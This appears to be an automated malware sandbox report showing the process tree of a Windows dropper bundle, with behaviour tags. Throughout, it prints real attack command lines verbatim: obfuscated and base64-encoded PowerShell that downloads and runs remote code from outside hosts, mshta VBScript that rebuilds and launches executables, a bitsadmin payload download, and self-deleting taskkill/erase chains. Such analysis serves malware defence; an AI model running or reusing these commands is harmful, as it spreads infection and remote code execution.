C:\Users\Admin\AppData\Roaming\2175204.scr"C:\Users\Admin\AppData\Roaming\2175204.scr" /S8⤵
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup.exe" & exit8⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "setup.exe" /f9⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbScriPt: CLOSe ( CreatEOBjECt ("WScRIpt.sHell" ). rUn ( "CmD.Exe /Q /C COpy /Y ""C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF """" =="""" for %z iN (""C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"") do taskkill -f /Im ""%~nXz"" " , 0 , tRue ))8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C COpy /Y "C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF "" =="" for %z iN ("C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe") do taskkill -f /Im "%~nXz"9⤵
-
C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u10⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbScriPt: CLOSe ( CreatEOBjECt ("WScRIpt.sHell" ). rUn ( "CmD.Exe /Q /C COpy /Y ""C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE"" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF ""/pni3MGzH3fZ3zm0HbFMiEo11u"" =="""" for %z iN (""C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE"") do taskkill -f /Im ""%~nXz"" " , 0 , tRue ))11⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C COpy /Y "C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF "/pni3MGzH3fZ3zm0HbFMiEo11u" =="" for %z iN ("C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE") do taskkill -f /Im "%~nXz"12⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscript: cLoSE ( cREAtEObJect ( "wSCRipT.SHELl" ). Run("Cmd /Q /C eCHo | SeT /p = ""MZ"" > 4~T6.Kj6& cOPy /b /y 4~T6.kJ6 +JJDPQL_.2B+ Z8ISJ6._Nm+oAykH.~~ +kdDPiLEn.~T5 + MZaNA.E ..\Kz_AMsXL.6g & Del /q *& STArT control ..\kZ_AmsXL.6G " ,0, trUE ) )11⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C eCHo | SeT /p = "MZ" > 4~T6.Kj6&cOPy /b /y 4~T6.kJ6+JJDPQL_.2B+Z8ISJ6._Nm+oAykH.~~ +kdDPiLEn.~T5 + MZaNA.E ..\Kz_AMsXL.6g & Del /q *& STArT control ..\kZ_AmsXL.6G12⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SeT /p = "MZ" 1>4~T6.Kj6"13⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHo "13⤵
-
C:\Windows\SysWOW64\control.execontrol ..\kZ_AmsXL.6G13⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\kZ_AmsXL.6G14⤵
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL ..\kZ_AmsXL.6G15⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 ..\kZ_AmsXL.6G16⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f /Im "sfx_123_206.exe"10⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\is-V60SK.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-V60SK.tmp\setup_2.tmp" /SL5="$102CC,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"8⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT9⤵
-
C:\Users\Admin\AppData\Local\Temp\is-8U88J.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-8U88J.tmp\setup_2.tmp" /SL5="$202CC,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT10⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-RNPTR.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-RNPTR.tmp\postback.exe" ss111⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\explorer.exeexplorer.exe ss112⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#########-#ob#jec######t N#et#.W#####eb#Cl#ie#nt#).###Up#loa#dSt#######ri#####ng(#''h#t#tp#:###//shellloader.top/#w#el#co####me''#,###''S#e#ve#n#J#o###k##er''###)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"13⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#########-#ob#jec######t N#et#.W#####eb#Cl#ie#nt#).###Up#loa#dSt#######ri#####ng(#''h#t#tp#:###//shellloader.top/#w#el#co####me''#,###''S#e#ve#n#J#o###k##er''###)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"14⤵
- Blocklisted process makes network request
-
C:\Users\Admin\AppData\Local\Temp\RV8MiD2jx.exe"C:\Users\Admin\AppData\Local\Temp\RV8MiD2jx.exe"13⤵
-
C:\Windows\SYSTEM32\cmd.execmd /c "helimlim.bat"14⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w h -enc IAAkAGEAPQBpAHcAcgAgACcAaAB0AHQAcAA6AC8ALwA0ADUALgA2ADEALgAxADMANwAuADEANwAyAC8AeQByAGQALgBwAHMAMQAnACAALQBVAHMAZQBCAGEAcwBpAGMAUABBAHIAcwBpAG4AZwAgAHwAaQBlAHgA15⤵
- Blocklisted process makes network request
-
C:\Windows\system32\wscript.exe"C:\Windows\system32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\start.vbs16⤵
-
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\pli-game.exe"C:\Users\Admin\AppData\Local\Temp\pli-game.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"7⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed15cdfe4f1ee8.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC54B9F92\Wed15cdfe4f1ee8.exeWed15cdfe4f1ee8.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe(cReATEOBJecT ("WScRIPt.SHelL" ).RUn ("C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\7zSC54B9F92\Wed15cdfe4f1ee8.exe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF """" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\7zSC54B9F92\Wed15cdfe4f1ee8.exe"" ) do taskkill -F -Im ""%~nXU"" ", 0, trUE) )6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\AppData\Local\Temp\7zSC54B9F92\Wed15cdfe4f1ee8.exe" SkVPVS3t6Y8W.EXe &&STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF ""== "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\7zSC54B9F92\Wed15cdfe4f1ee8.exe" ) do taskkill -F -Im "%~nXU"7⤵
-
C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXeSkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK8⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe(cReATEOBJecT ("WScRIPt.SHelL" ).RUn ("C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF ""/phmOv~geMVZhd~P51OGqJQYYUK "" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" ) do taskkill -F -Im ""%~nXU"" ", 0, trUE) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" SkVPVS3t6Y8W.EXe &&STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF "/phmOv~geMVZhd~P51OGqJQYYUK "== "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" ) do taskkill -F -Im "%~nXU"10⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBsCRipT:CloSE ( CReaTEoBJEct ( "WSCRIPT.SHElL" ). rUn("cMd /q /C eCHo | SET /P = ""MZ"" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ + 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM & StARt control .\FUEj5.QM " , 0 , tRuE ) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /C eCHo | SET /P = "MZ" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ+ 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM& StARt control .\FUEj5.QM10⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHo "11⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>yW7bB.DeE"11⤵
-
C:\Windows\SysWOW64\control.execontrol .\FUEj5.QM11⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\FUEj5.QM12⤵
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\FUEj5.QM13⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\FUEj5.QM14⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -F -Im "Wed15cdfe4f1ee8.exe"8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed150b6a68b74a9.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC54B9F92\Wed150b6a68b74a9.exeWed150b6a68b74a9.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed15bfd6504f7748c.exe /mixone4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC54B9F92\Wed15bfd6504f7748c.exeWed15bfd6504f7748c.exe /mixone5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4284 -s 6606⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4284 -s 6766⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4284 -s 6846⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4284 -s 6566⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4284 -s 8846⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4284 -s 9326⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4284 -s 11966⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4284 -s 11686⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4284 -s 11566⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Wed15bfd6504f7748c.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zSC54B9F92\Wed15bfd6504f7748c.exe" & exit6⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Wed15bfd6504f7748c.exe" /f7⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed15c2e7469a14dca.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC54B9F92\Wed15c2e7469a14dca.exeWed15c2e7469a14dca.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Wed15c2e7469a14dca.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zSC54B9F92\Wed15c2e7469a14dca.exe" & del C:\ProgramData\*.dll & exit6⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Wed15c2e7469a14dca.exe /f7⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 67⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed15566afaea59e.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC54B9F92\Wed15566afaea59e.exeWed15566afaea59e.exe5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed15edb855a49.exe4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed15fbd6ef41b4f.exe4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed15e2f113a40ce5.exe4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed1556d5b7e9b2c8.exe4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed15ac1df9305ded09.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed1529d8198a8f0c1.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC54B9F92\Wed15edb855a49.exeWed15edb855a49.exe1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\7zSC54B9F92\Wed1556d5b7e9b2c8.exeWed1556d5b7e9b2c8.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC54B9F92\Wed15fbd6ef41b4f.exeWed15fbd6ef41b4f.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-332AK.tmp\Wed15fbd6ef41b4f.tmp"C:\Users\Admin\AppData\Local\Temp\is-332AK.tmp\Wed15fbd6ef41b4f.tmp" /SL5="$A005C,239846,156160,C:\Users\Admin\AppData\Local\Temp\7zSC54B9F92\Wed15fbd6ef41b4f.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-1HR2N.tmp\Sayma.exe"C:\Users\Admin\AppData\Local\Temp\is-1HR2N.tmp\Sayma.exe" /S /UID=burnerch23⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
-
C:\Program Files\7-Zip\VNMHQZBEJA\ultramediaburner.exe"C:\Program Files\7-Zip\VNMHQZBEJA\ultramediaburner.exe" /VERYSILENT4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-IA6EL.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-IA6EL.tmp\ultramediaburner.tmp" /SL5="$203A6,281924,62464,C:\Program Files\7-Zip\VNMHQZBEJA\ultramediaburner.exe" /VERYSILENT5⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\1d-527a4-753-1969f-01b1722c667d7\Gixesemegy.exe"C:\Users\Admin\AppData\Local\Temp\1d-527a4-753-1969f-01b1722c667d7\Gixesemegy.exe"4⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\8d-99b71-284-306ad-77cf712bf3165\Lyshopadiqi.exe"C:\Users\Admin\AppData\Local\Temp\8d-99b71-284-306ad-77cf712bf3165\Lyshopadiqi.exe"4⤵
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\51fczwbi.55y\GcleanerEU.exe /eufive & exit5⤵
-
C:\Users\Admin\AppData\Local\Temp\51fczwbi.55y\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\51fczwbi.55y\GcleanerEU.exe /eufive6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6304 -s 6487⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6304 -s 6327⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6304 -s 7647⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6304 -s 8007⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6304 -s 8887⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "GcleanerEU.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\51fczwbi.55y\GcleanerEU.exe" & exit7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "GcleanerEU.exe" /f8⤵
- Kills process with taskkill
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wxfmhdip.scd\installer.exe /qn CAMPAIGN="654" & exit5⤵
-
C:\Users\Admin\AppData\Local\Temp\wxfmhdip.scd\installer.exeC:\Users\Admin\AppData\Local\Temp\wxfmhdip.scd\installer.exe /qn CAMPAIGN="654"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\wxfmhdip.scd\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\wxfmhdip.scd\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1632951009 /qn CAMPAIGN=""654"" " CAMPAIGN="654"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\amclwgfr.d1f\any.exe & exit5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\amclwgfr.d1f\any.exeC:\Users\Admin\AppData\Local\Temp\amclwgfr.d1f\any.exe6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\j3rk1m1n.lfa\gcleaner.exe /mixfive & exit5⤵
-
C:\Users\Admin\AppData\Local\Temp\j3rk1m1n.lfa\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\j3rk1m1n.lfa\gcleaner.exe /mixfive6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7768 -s 6487⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7768 -s 6607⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7768 -s 6687⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7768 -s 6727⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7768 -s 8847⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7768 -s 9447⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7768 -s 11687⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7768 -s 11807⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "gcleaner.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\j3rk1m1n.lfa\gcleaner.exe" & exit7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "gcleaner.exe" /f8⤵
- Kills process with taskkill
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\15jcl5uq.hvr\autosubplayer.exe /S & exit5⤵
-
C:\Users\Admin\AppData\Local\Temp\15jcl5uq.hvr\autosubplayer.exeC:\Users\Admin\AppData\Local\Temp\15jcl5uq.hvr\autosubplayer.exe /S6⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspEAFF.tmp\tempfile.ps1"7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspEAFF.tmp\tempfile.ps1"7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspEAFF.tmp\tempfile.ps1"7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspEAFF.tmp\tempfile.ps1"7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspEAFF.tmp\tempfile.ps1"7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspEAFF.tmp\tempfile.ps1"7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspEAFF.tmp\tempfile.ps1"7⤵
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://lighteningstoragecenter.com/data/data.7z C:\zip.7z7⤵
- Download via BitsAdmin
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -piKZNpnxj7ps2Vba -y x C:\zip.7z -o"C:\Program Files\temp_files\"7⤵
- Drops file in Program Files directory
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pZy3DKDGFkSCqK3x -y x C:\zip.7z -o"C:\Program Files\temp_files\"7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspEAFF.tmp\tempfile.ps1"7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspEAFF.tmp\tempfile.ps1"7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspEAFF.tmp\tempfile.ps1"7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspEAFF.tmp\tempfile.ps1"7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspEAFF.tmp\tempfile.ps1"7⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\OnpGSK\OnpGSK.dll" OnpGSK7⤵
-
C:\Windows\system32\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\OnpGSK\OnpGSK.dll" OnpGSK8⤵
- Drops file in System32 directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspEAFF.tmp\tempfile.ps1"7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspEAFF.tmp\tempfile.ps1"7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspEAFF.tmp\tempfile.ps1"7⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspEAFF.tmp\tempfile.ps1"7⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspEAFF.tmp\tempfile.ps1"7⤵
-
C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe"C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT7⤵
-
